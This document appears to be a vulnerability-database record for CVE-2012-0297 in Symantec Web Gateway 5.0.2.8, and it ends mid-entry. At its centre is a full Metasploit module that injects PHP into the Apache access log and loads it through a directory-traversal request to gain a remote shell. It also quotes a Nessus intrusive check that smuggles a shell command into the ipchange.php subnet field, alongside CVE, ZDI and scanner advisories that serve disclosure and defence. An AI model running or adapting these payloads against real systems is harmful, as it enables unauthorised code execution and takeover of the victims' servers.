Symantec Web Gateway 5.0.2.8 Command Execution

2012-05-28T00:00:00

Description

{"id": "PACKETSTORM:113090", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Symantec Web Gateway 5.0.2.8 Command Execution", "description": "", "published": "2012-05-28T00:00:00", "modified": "2012-05-28T00:00:00", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 10.0}, "href": "https://packetstormsecurity.com/files/113090/Symantec-Web-Gateway-5.0.2.8-Command-Execution.html", "reporter": "unknown", "references": [], "cvelist": ["CVE-2012-0297"], "lastseen": "2016-12-05T22:14:57", "viewCount": 13, "enchantments": {"score": {"value": 0.1, "vector": "NONE"}, "dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B3B3DA42-859E-48BF-B67E-3A4E5F266E97"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2012-311"]}, {"type": "cve", "idList": ["CVE-2012-0297"]}, {"type": "d2", "idList": ["D2SEC_SYMWEBGW"]}, {"type": "dsquare", "idList": ["E-158", "E-163"]}, {"type": "exploitdb", "idList": ["EDB-ID:19406"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:9A23BC40C97079E951A8BC4B95B92342"]}, {"type": "nessus", "idList": ["SYMANTEC_WEB_GATEWAY_IPCHANGE_RCE.NASL", "SYMANTEC_WEB_GATEWAY_SYM12-006.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310802632"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:113050", "PACKETSTORM:113485", "PACKETSTORM:114231"]}, {"type": "saint", "idList": ["SAINT:09723FE34C900B59CB593CFB790946C5", "SAINT:0D475EE538584A09C093C3CE051B9477", "SAINT:79AF1DDEAA9DAE2B17DA10C8A568E698", "SAINT:CA79171627977B6EB496110895555ECA"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:28148", "SECURITYVULNS:VULN:12416"]}, {"type": "seebug", "idList": ["SSV:73332"]}, {"type": "symantec", "idList": ["SMNTC-1250"]}, {"type": "zdi", "idList": ["ZDI-12-090"]}]}, "backreferences": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2012-311"]}, {"type": "cve", "idList": ["CVE-2012-0297"]}, {"type": "dsquare", "idList": ["E-158"]}, {"type": "exploitdb", "idList": ["EDB-ID:19406"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/LINUX/HTTP/SYMANTEC_WEB_GATEWAY_EXEC", "MSF:EXPLOIT/LINUX/HTTP/SYMANTEC_WEB_GATEWAY_LFI"]}, {"type": "nessus", "idList": ["SYMANTEC_WEB_GATEWAY_SYM12-006.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310802632"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:113485", "PACKETSTORM:114231"]}, {"type": "saint", "idList": ["SAINT:CA79171627977B6EB496110895555ECA"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:28148"]}, {"type": "seebug", "idList": ["SSV:73332"]}, {"type": "zdi", "idList": ["ZDI-12-090"]}]}, "exploitation": null, "vulnersScore": 0.1}, "sourceHref": "https://packetstormsecurity.com/files/download/113090/symantec_web_gateway_lfi.rb.txt", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"Symantec Web Gateway 5.0.2.8 Command Execution Vulnerability\", \n'Description' => %q{ \nThis module exploits a vulnerability found in Symantec Web Gateway's HTTP \nservice. By injecting PHP code in the access log, it is possible to load it \nwith a directory traversal flaw, which allows remote code execution under the \ncontext of 'apache'. Please note that it may take up to several minutes to \nretrieve access_log, which is about the amount of time required to see a shell \nback. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Unknown', #Discovery \n'muts', #PoC \n'sinn3r' #Metasploit \n], \n'References' => \n[ \n['CVE', '2012-0297'], \n['EDB', '18932'], \n['URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00'] \n], \n'Payload' => \n{ \n'BadChars' => \"\\x00\" \n}, \n'DefaultOptions' => \n{ \n'WfsDelay' => 300, #5 minutes \n'DisablePayloadHandler' => 'false', \n'ExitFunction' => \"none\" \n}, \n'Platform' => ['php'], \n'Arch' => ARCH_PHP, \n'Targets' => \n[ \n['Symantec Web Gateway 5.0.2.8', {}], \n], \n'Privileged' => false, \n'DisclosureDate' => \"May 17 2012\", \n'DefaultTarget' => 0)) \nend \n \n \ndef check \nres = send_request_raw({ \n'method' => 'GET', \n'uri' => '/spywall/login.php' \n}) \n \nif res and res.body =~ /\\<title\\>Symantec Web Gateway\\<\\/title\\>/ \nreturn Exploit::CheckCode::Detected \nelse \nreturn Exploit::CheckCode::Safe \nend \nend \n \n \ndef exploit \npeer = \"#{rhost}:#{rport}\" \n \nphp = %Q|<?php #{payload.encoded} ?>| \n \n# Inject PHP to log \nprint_status(\"#{peer} - Injecting PHP to log...\") \nres = send_request_raw({ \n'method' => 'GET', \n'uri' => \"/#{php}\" \n}) \n \nselect(nil, nil, nil, 1) \n \n# Use the directory traversal to load the PHP code \n# access_log takes a long time to retrieve \nprint_status(\"#{peer} - Loading PHP code..\") \nsend_request_raw({ \n'method' => 'GET', \n'uri' => '/spywall/releasenotes.php?relfile=../../../../../usr/local/apache2/logs/access_log' \n}) \n \nprint_status(\"#{peer} - Waiting for a session, may take some time...\") \n \nselect(nil, nil, nil, 1) \n \nhandler \nend \nend \n`\n", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1659961154, "score": 1659961989}, "_internal": {"score_hash": "d5943f968526c85146326b24ad0ab404"}}

{"cve": [{"lastseen": "2022-03-23T11:36:36", "description": "The management GUI in Symantec Web Gateway 5.0.x before 5.0.3 does not properly restrict access to application scripts, which allows remote attackers to execute arbitrary code by (1) injecting crafted data or (2) including crafted data.", "cvss3": {}, "published": "2012-05-21T20:55:00", "type": "cve", "title": "CVE-2012-0297", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0297"], "modified": "2017-12-05T02:29:00", "cpe": ["cpe:/a:symantec:web_gateway:5.0", "cpe:/a:symantec:web_gateway:5.0.2", "cpe:/a:symantec:web_gateway:5.0.1"], "id": "CVE-2012-0297", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0297", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:symantec:web_gateway:5.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:symantec:web_gateway:5.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:symantec:web_gateway:5.0:*:*:*:*:*:*:*"]}], "checkpoint_advisories": [{"lastseen": "2022-08-02T18:51:06", "description": "A remote command execution vulnerability has been reported in Symantec Web Gateway.", "cvss3": {}, "published": "2012-07-23T00:00:00", "type": "checkpoint_advisories", "title": "Symantec Web Gateway Management Console Remote Shell Command Execution (CVE-2012-0297)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0297"], "modified": "2022-08-02T00:00:00", "id": "CPAI-2012-311", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}], "dsquare": [{"lastseen": "2021-07-28T14:33:45", "description": "Local file include vulnerability in Symantec Web Gateway releasenotes.php\n\nVulnerability Type: Local File Include", "cvss3": {}, "published": "2012-06-09T00:00:00", "type": "dsquare", "title": "Symantec Web Gateway 5.0.2 LFI", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0297"], "modified": "2013-04-02T00:00:00", "id": "E-163", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:33:45", "description": "Remote command execution vulnerability in Symantec Web Gateway network.php\n\nVulnerability Type: Remote Command Execution", "cvss3": {}, "published": "2012-06-09T00:00:00", "type": "dsquare", "title": "Symantec Web Gateway 5.0.2 RCE", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0297"], "modified": "2013-04-02T00:00:00", "id": "E-158", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdi": [{"lastseen": "2022-01-31T20:52:51", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Symantec Web Gateway. Authentication is not required to exploit this vulnerability. The specific flaw exists due to insufficiently filtered user-supplied data used in a call to exec() in multiple script pages. The affected scripts are located in '/spywall/ipchange.php' and 'network.php'. There is also a flaw in '/spywall/download_file.php' that allows unauthenticated users to download and delete any file on the server.", "cvss3": {}, "published": "2012-06-08T00:00:00", "type": "zdi", "title": "Symantec Web Gateway Shell Command Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0297"], "modified": "2012-06-08T00:00:00", "id": "ZDI-12-090", "href": "https://www.zerodayinitiative.com/advisories/ZDI-12-090/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-08-19T12:58:17", "description": "The remote web server is hosting a version of Symantec Web Gateway that is affected by a shell command injection vulnerability. The ipchange.php script calls the exec() function with user-controlled input that is not properly sanitized. A remote, unauthenticated attacker could exploit this to execute arbitrary shell commands as the apache user. After exploitation, obtaining a root shell is trivial.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2012-05-21T00:00:00", "type": "nessus", "title": "Symantec Web Gateway ipchange.php Shell Command Injection (SYM12-006) (intrusive check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-0297"], "modified": "2021-01-19T00:00:00", "cpe": ["cpe:/a:symantec:web_gateway"], "id": "SYMANTEC_WEB_GATEWAY_IPCHANGE_RCE.NASL", "href": "https://www.tenable.com/plugins/nessus/59208", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59208);\n script_version(\"1.31\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2012-0297\");\n script_bugtraq_id(53444);\n script_xref(name:\"TRA\", value:\"TRA-2012-03\");\n script_xref(name:\"EDB-ID\", value:\"19065\");\n\n script_name(english:\"Symantec Web Gateway ipchange.php Shell Command Injection (SYM12-006) (intrusive check)\");\n script_summary(english:\"Uploads and executes a PHP script\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web security application hosted on the remote web server has a\ncommand injection vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote web server is hosting a version of Symantec Web Gateway\nthat is affected by a shell command injection vulnerability. The\nipchange.php script calls the exec() function with user-controlled\ninput that is not properly sanitized. A remote, unauthenticated\nattacker could exploit this to execute arbitrary shell commands as\nthe apache user. After exploitation, obtaining a root shell is\ntrivial.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.tenable.com/security/research/tra-2012-03\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-090/\");\n # https://support.symantec.com/en_US/article.SYMSA1250.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5b5929ae\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Symantec Web Gateway version 5.0.3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Symantec Web Gateway 5.0.2 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Symantec Web Gateway 5.0.2.8 relfile File Inclusion Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/05/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/05/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/05/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:symantec:web_gateway\");\n script_end_attributes();\n\n script_category(ACT_DESTRUCTIVE_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"symantec_web_gateway_detect.nasl\");\n script_require_keys(\"www/symantec_web_gateway\");\n script_require_ports(\"Services/www\", 443);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"data_protection.inc\");\n\nport = get_http_port(default:443, php:TRUE);\ninstall = get_install_from_kb(appname:'symantec_web_gateway', port:port, exit_on_fail:TRUE);\n\nurl = install['dir'] + '/ipchange.php';\nfilename = strcat('cleaner/', SCRIPT_NAME, '-', unixtime(), '.php');\ncmd = 'echo \"<? system(\"id\"); ?>\" > ' + filename;\npostdata = 'ip=localhost%0d%0a&subnet=\"|' + cmd + '|\"';\nres = http_send_recv3(\n method:'POST',\n port:port,\n item:url,\n content_type:'application/x-www-form-urlencoded',\n data:postdata,\n exit_on_fail:TRUE\n);\nscript_creation = http_last_sent_request();\n\nurl = install['dir'] + '/' + filename;\nres = http_send_recv3(method:'GET', item:url, port:port, exit_on_fail:TRUE);\n\nif(!egrep(pattern:'uid=[0-9]+.*gid=[0-9]+.*', string:res[2]))\n audit(AUDIT_WEB_APP_NOT_AFFECTED, 'Symantec Web Gateway', build_url(qs:install['dir'], port:port));\n\nif (report_verbosity > 0)\n{\n report =\n '\\nNessus created a PHP file by sending the following request :\\n\\n' +\n crap(data:\"-\", length:30)+' Request '+ crap(data:\"-\", length:30)+'\\n'+\n chomp(script_creation) + '\\n' +\n crap(data:\"-\", length:30)+' Request '+ crap(data:\"-\", length:30)+'\\n'+\n '\\nThis file executes the \"id\" command and is located at :\\n\\n' +\n build_url(qs:url, port:port) + '\\n';\n\n if (report_verbosity > 1)\n report += '\\nRequesting this file returned the following output :\\n\\n' + \n data_protection::sanitize_uid(output:chomp(res[2])) + '\\n';\n\n security_hole(port:port, extra:report);\n}\nelse security_hole(port);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:58:21", "description": "According to its self-reported version number, the remote web server is hosting Symantec Web Gateway before version 5.0.3, which has the following vulnerabilities :\n\n -There are multiple cross-site scripting vulnerabilities.\n (CVE-2012-0296)\n\n - Multiple shell command injection and local file inclusion vulnerabilities exist that could lead to arbitrary code execution. (CVE-2012-0297)\n\n - Unauthenticated users are allowed to read/delete arbitrary files as root. (CVE-2012-0298)\n\n - A file upload vulnerability exists that could lead to arbitrary code execution. (CVE-2012-0299)\n\nA remote, unauthenticated attacker could exploit the code execution vulnerabilities to execute commands as the apache user. After exploitation, obtaining a root shell is trivial.", "cvss3": {"score": null, "vector": null}, "published": "2012-05-21T00:00:00", "type": "nessus", "title": "Symantec Web Gateway < 5.0.3 Multiple Vulnerabilities (SYM12-006) (version check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-0296", "CVE-2012-0297", "CVE-2012-0298", "CVE-2012-0299"], "modified": "2021-01-19T00:00:00", "cpe": ["cpe:/a:symantec:web_gateway"], "id": "SYMANTEC_WEB_GATEWAY_SYM12-006.NASL", "href": "https://www.tenable.com/plugins/nessus/59209", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\n\nif (description)\n{\n script_id(59209);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\n \"CVE-2012-0296\",\n \"CVE-2012-0297\",\n \"CVE-2012-0298\",\n \"CVE-2012-0299\"\n );\n script_bugtraq_id(\n 53396,\n 53442,\n 53443,\n 53444\n );\n script_xref(name:\"TRA\", value:\"TRA-2012-03\");\n script_xref(name:\"EDB-ID\", value:\"18832\");\n script_xref(name:\"EDB-ID\", value:\"18932\");\n script_xref(name:\"EDB-ID\", value:\"18942\");\n script_xref(name:\"EDB-ID\", value:\"19065\");\n script_xref(name:\"EDB-ID\", value:\"19406\");\n\n script_name(english:\"Symantec Web Gateway < 5.0.3 Multiple Vulnerabilities (SYM12-006) (version check)\");\n script_summary(english:\"Checks SWG version\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web security application hosted on the remote web server has\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the remote web server\nis hosting Symantec Web Gateway before version 5.0.3, which has the\nfollowing vulnerabilities :\n\n -There are multiple cross-site scripting vulnerabilities.\n (CVE-2012-0296)\n\n - Multiple shell command injection and local file inclusion\n vulnerabilities exist that could lead to arbitrary code\n execution. (CVE-2012-0297)\n\n - Unauthenticated users are allowed to read/delete arbitrary\n files as root. (CVE-2012-0298)\n\n - A file upload vulnerability exists that could lead to\n arbitrary code execution. (CVE-2012-0299)\n\nA remote, unauthenticated attacker could exploit the code execution\nvulnerabilities to execute commands as the apache user. After\nexploitation, obtaining a root shell is trivial.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.tenable.com/security/research/tra-2012-03\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-090/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-091/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/523064/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/523065/30/0/threaded\");\n # https://support.symantec.com/en_US/article.SYMSA1250.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5b5929ae\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Symantec Web Gateway version 5.0.3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Symantec Web Gateway 5.0.2 File Upload\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Symantec Web Gateway 5.0.2.8 Arbitrary PHP File Upload Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/05/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/05/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/05/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:symantec:web_gateway\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"symantec_web_gateway_detect.nasl\");\n script_require_keys(\"www/symantec_web_gateway\");\n script_require_ports(\"Services/www\", 443);\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"audit.inc\");\n\nport = get_http_port(default:443, php:TRUE);\ninstall = get_install_from_kb(appname:'symantec_web_gateway', port:port, exit_on_fail:TRUE);\ndir = install['dir'];\nver = install['ver'];\nfix = '5.0.3';\n\nurl = build_url(port:port, qs:dir);\n\nif (ver == UNKNOWN_VER)\n audit(AUDIT_UNKNOWN_WEB_APP_VER, 'Symantec Web Gateway', url);\n\nif (ver =~ '^5' && ver_compare(ver:ver, fix:fix, strict:FALSE) < 0)\n{\n set_kb_item(name:'www/' + port + '/XSS', value:TRUE);\n\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' + url +\n '\\n Installed version : ' + ver +\n '\\n Fixed version : ' + fix + '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, 'Symantec Web Gateway', url, ver);\n\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:44", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nZDI-12-090 : Symantec Web Gateway Shell Command Injection Remote Code\r\nExecution Vulnerability\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-12-090\r\nJune 8, 2012\r\n\r\n- -- CVE ID:\r\n\r\nCVE-2012-0297\r\n\r\n- -- CVSS:\r\n7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P\r\n\r\n- -- Affected Vendors:\r\n\r\nSymantec\r\n\r\n- -- Affected Products:\r\n\r\nSymantec Web Gateway\r\n\r\n- -- Vulnerability Details:\r\n\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of Symantec Web Gateway. Authentication is not\r\nrequired to exploit this vulnerability. \r\n\r\nThe specific flaw exists due to insufficiently filtered user-supplied data\r\nused in a call to exec() in multiple script pages. The affected scripts are\r\nlocated in '/spywall/ipchange.php' and 'network.php'. There is also a flaw\r\nin '/spywall/download_file.php' that allows unauthenticated users to\r\ndownload and delete any file on the server. \r\n\r\n- -- Vendor Response:\r\n\r\nSymantec has issued an update to correct this vulnerability. More details\r\ncan be found at:\r\n\r\nhttp://www.symantec.com/security_response/securityupdates/detail.jsp?fid=se\r\ncurity_advisory&pvid=security_advisory&year=2012&suid=20120517_00\r\n\r\n- -- Disclosure Timeline:\r\n\r\n2011-11-22 - Vulnerability reported to vendor\r\n2012-06-08 - Coordinated public release of advisory\r\n\r\n- -- Credit:\r\n\r\nThis vulnerability was discovered by:\r\n\r\n* Tenable Network Security\r\n\r\n- -- About the Zero Day Initiative (ZDI):\r\n\r\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents \r\na best-of-breed model for rewarding security researchers for responsibly\r\ndisclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is\r\nused. TippingPoint does not re-sell the vulnerability details or any\r\nexploit code. Instead, upon notifying the affected product vendor,\r\nTippingPoint provides its customers with zero day protection through\r\nits intrusion prevention technology. Explicit details regarding the\r\nspecifics of the vulnerability are not exposed to any parties until\r\nan official vendor patch is publicly available. Furthermore, with the\r\naltruistic aim of helping to secure a broader user base, TippingPoint\r\nprovides this vulnerability information confidentially to security\r\nvendors (including competitors) who have a vulnerability protection or\r\nmitigation product.\r\n\r\nOur vulnerability disclosure policy is available online at:\r\n\r\n http://www.zerodayinitiative.com/advisories/disclosure_policy/\r\n\r\nFollow the ZDI on Twitter:\r\n\r\n http://twitter.com/thezdi\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: PGP Desktop 10.2.0 (Build 1950)\r\nCharset: utf-8\r\n\r\nwsBVAwUBT9JkrlVtgMGTo1scAQK0Bwf+Ns64PZhwAAyfloBVx8Pb/6DTVjd8g1yp\r\nXi5ynP006/9fLSnI2UACJdFJqUj0MPM6YUuOgpsGfncxVYVAc96pawv3pxfsfwfm\r\nkkAo2aUPIsx4xQP3Mtz3YNpWb8jl/L1SUiNLu4ogKhuA1y82gXIRot4wNq9s0DWr\r\n11d8pTUgHJtPnlH43bWAvzqnnsf0OapaePuHEfOArEZK5kUBangirZSOyYiH+zfG\r\nAxl29pM2pLEC2ZNtJ/rbEaQhrG1chwt9+QIiQWRb5Z0V7FssO1M6AduMF7D71LoF\r\nHxgfwMBHPTlGJoWYb3LovAfDrlbeJm5sQGIabUha4TNUnAuInSURBQ==\r\n=fH5n\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "cvss3": {}, "published": "2012-06-13T00:00:00", "title": "ZDI-12-090 : Symantec Web Gateway Shell Command Injection Remote Code Execution Vulnerability", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2012-0297"], "modified": "2012-06-13T00:00:00", "id": "SECURITYVULNS:DOC:28148", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28148", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T19:13:51", "description": "Code execution, unfiltered shell characters.", "edition": 2, "cvss3": {}, "published": "2012-06-13T00:00:00", "title": "Symantec WebGateway security vulnerabilities", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2012-0297", "CVE-2012-0299"], "modified": "2012-06-13T00:00:00", "id": "SECURITYVULNS:VULN:12416", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12416", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "saint": [{"lastseen": "2022-01-26T11:36:04", "description": "Added: 06/11/2012 \nCVE: [CVE-2012-0297](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0297>) \nBID: [53444](<http://www.securityfocus.com/bid/53444>) \nOSVDB: [82023](<http://www.osvdb.org/82023>) \n\n\n### Background\n\nSymantec Web Gateway protects organizations against multiple types of Web-based malware and prevents data loss over the Web. \n\n### Problem\n\nSymantec Web Gateway fails to properly sanitize user-supplied input passed to \"/spywall/releasenotes.php\" via the 